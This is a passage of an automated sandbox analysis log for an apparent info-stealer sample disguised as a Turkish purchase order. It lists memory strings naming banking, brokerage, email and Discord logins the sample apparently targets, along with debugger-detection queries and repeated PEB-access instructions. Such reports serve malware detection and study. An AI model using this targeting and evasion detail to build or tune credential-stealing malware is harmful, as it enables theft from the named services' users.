            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: 3y36225.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: 3y36225.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: 3y36225.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: AMC password management pageVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: 3y36225.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: 3y36225.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: 3y36225.13.drBinary or memory string: discord.comVMware20,11696497155f
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1358819440.000000000D530000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: BTQemuFc9M
            Source: 3y36225.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: 3y36225.13.drBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: 3y36225.13.drBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: 3y36225.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: 3y36225.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: 3y36225.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\shutdown.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00417E63 LdrLoadDll,5_2_00417E63
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172C156 mov eax, dword ptr fs:[00000030h]5_2_0172C156
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C8158 mov eax, dword ptr fs:[00000030h]5_2_017C8158
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736154 mov eax, dword ptr fs:[00000030h]5_2_01736154
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C4144 mov eax, dword ptr fs:[00000030h]5_2_017C4144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C4144 mov ecx, dword ptr fs:[00000030h]5_2_017C4144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01760124 mov eax, dword ptr fs:[00000030h]5_2_01760124
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DA118 mov ecx, dword ptr fs:[00000030h]5_2_017DA118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DA118 mov eax, dword ptr fs:[00000030h]5_2_017DA118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_018061E5 mov eax, dword ptr fs:[00000030h]5_2_018061E5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F0115 mov eax, dword ptr fs:[00000030h]5_2_017F0115
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov eax, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE10E mov ecx, dword ptr fs:[00000030h]5_2_017DE10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017601F8 mov eax, dword ptr fs:[00000030h]5_2_017601F8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE1D0 mov eax, dword ptr fs:[00000030h]5_2_017AE1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE1D0 mov ecx, dword ptr fs:[00000030h]5_2_017AE1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F61C3 mov eax, dword ptr fs:[00000030h]5_2_017F61C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B019F mov eax, dword ptr fs:[00000030h]5_2_017B019F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804164 mov eax, dword ptr fs:[00000030h]5_2_01804164
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804164 mov eax, dword ptr fs:[00000030h]5_2_01804164
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A197 mov eax, dword ptr fs:[00000030h]5_2_0172A197
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A197 mov eax, dword ptr fs:[00000030h]5_2_0172A197
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A197 mov eax, dword ptr fs:[00000030h]5_2_0172A197
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01770185 mov eax, dword ptr fs:[00000030h]5_2_01770185
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EC188 mov eax, dword ptr fs:[00000030h]5_2_017EC188
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EC188 mov eax, dword ptr fs:[00000030h]5_2_017EC188
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D4180 mov eax, dword ptr fs:[00000030h]5_2_017D4180
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D4180 mov eax, dword ptr fs:[00000030h]5_2_017D4180
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175C073 mov eax, dword ptr fs:[00000030h]5_2_0175C073
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01732050 mov eax, dword ptr fs:[00000030h]5_2_01732050
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B6050 mov eax, dword ptr fs:[00000030h]5_2_017B6050
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C6030 mov eax, dword ptr fs:[00000030h]5_2_017C6030
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A020 mov eax, dword ptr fs:[00000030h]5_2_0172A020
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172C020 mov eax, dword ptr fs:[00000030h]5_2_0172C020
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E016 mov eax, dword ptr fs:[00000030h]5_2_0174E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E016 mov eax, dword ptr fs:[00000030h]5_2_0174E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E016 mov eax, dword ptr fs:[00000030h]5_2_0174E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E016 mov eax, dword ptr fs:[00000030h]5_2_0174E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B4000 mov ecx, dword ptr fs:[00000030h]5_2_017B4000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D2000 mov eax, dword ptr fs:[00000030h]5_2_017D2000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172C0F0 mov eax, dword ptr fs:[00000030h]5_2_0172C0F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017720F0 mov ecx, dword ptr fs:[00000030h]5_2_017720F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0172A0E3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017380E9 mov eax, dword ptr fs:[00000030h]5_2_017380E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B60E0 mov eax, dword ptr fs:[00000030h]5_2_017B60E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B20DE mov eax, dword ptr fs:[00000030h]5_2_017B20DE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F60B8 mov eax, dword ptr fs:[00000030h]5_2_017F60B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F60B8 mov ecx, dword ptr fs:[00000030h]5_2_017F60B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017280A0 mov eax, dword ptr fs:[00000030h]5_2_017280A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C80A8 mov eax, dword ptr fs:[00000030h]5_2_017C80A8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173208A mov eax, dword ptr fs:[00000030h]5_2_0173208A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D437C mov eax, dword ptr fs:[00000030h]5_2_017D437C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov eax, dword ptr fs:[00000030h]5_2_017B035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov eax, dword ptr fs:[00000030h]5_2_017B035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov eax, dword ptr fs:[00000030h]5_2_017B035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov ecx, dword ptr fs:[00000030h]5_2_017B035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov eax, dword ptr fs:[00000030h]5_2_017B035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov eax, dword ptr fs:[00000030h]5_2_017B035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FA352 mov eax, dword ptr fs:[00000030h]5_2_017FA352
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D8350 mov ecx, dword ptr fs:[00000030h]5_2_017D8350
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172C310 mov ecx, dword ptr fs:[00000030h]5_2_0172C310
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01750310 mov ecx, dword ptr fs:[00000030h]5_2_01750310
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A30B mov eax, dword ptr fs:[00000030h]5_2_0176A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A30B mov eax, dword ptr fs:[00000030h]5_2_0176A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A30B mov eax, dword ptr fs:[00000030h]5_2_0176A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E3F0 mov eax, dword ptr fs:[00000030h]5_2_0174E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E3F0 mov eax, dword ptr fs:[00000030h]5_2_0174E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E3F0 mov eax, dword ptr fs:[00000030h]5_2_0174E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017663FF mov eax, dword ptr fs:[00000030h]5_2_017663FF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01808324 mov eax, dword ptr fs:[00000030h]5_2_01808324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01808324 mov ecx, dword ptr fs:[00000030h]5_2_01808324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01808324 mov eax, dword ptr fs:[00000030h]5_2_01808324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01808324 mov eax, dword ptr fs:[00000030h]5_2_01808324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE3DB mov eax, dword ptr fs:[00000030h]5_2_017DE3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE3DB mov eax, dword ptr fs:[00000030h]5_2_017DE3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE3DB mov ecx, dword ptr fs:[00000030h]5_2_017DE3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE3DB mov eax, dword ptr fs:[00000030h]5_2_017DE3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D43D4 mov eax, dword ptr fs:[00000030h]5_2_017D43D4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D43D4 mov eax, dword ptr fs:[00000030h]5_2_017D43D4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EC3CD mov eax, dword ptr fs:[00000030h]5_2_017EC3CD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017383C0 mov eax, dword ptr fs:[00000030h]5_2_017383C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017383C0 mov eax, dword ptr fs:[00000030h]5_2_017383C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017383C0 mov eax, dword ptr fs:[00000030h]5_2_017383C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017383C0 mov eax, dword ptr fs:[00000030h]5_2_017383C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B63C0 mov eax, dword ptr fs:[00000030h]5_2_017B63C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0180634F mov eax, dword ptr fs:[00000030h]5_2_0180634F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01728397 mov eax, dword ptr fs:[00000030h]5_2_01728397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01728397 mov eax, dword ptr fs:[00000030h]5_2_01728397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01728397 mov eax, dword ptr fs:[00000030h]5_2_01728397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172E388 mov eax, dword ptr fs:[00000030h]5_2_0172E388
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172E388 mov eax, dword ptr fs:[00000030h]5_2_0172E388
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172E388 mov eax, dword ptr fs:[00000030h]5_2_0172E388
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175438F mov eax, dword ptr fs:[00000030h]5_2_0175438F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175438F mov eax, dword ptr fs:[00000030h]5_2_0175438F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01734260 mov eax, dword ptr fs:[00000030h]5_2_01734260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01734260 mov eax, dword ptr fs:[00000030h]5_2_01734260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01734260 mov eax, dword ptr fs:[00000030h]5_2_01734260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172826B mov eax, dword ptr fs:[00000030h]5_2_0172826B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A250 mov eax, dword ptr fs:[00000030h]5_2_0172A250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736259 mov eax, dword ptr fs:[00000030h]5_2_01736259
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EA250 mov eax, dword ptr fs:[00000030h]5_2_017EA250
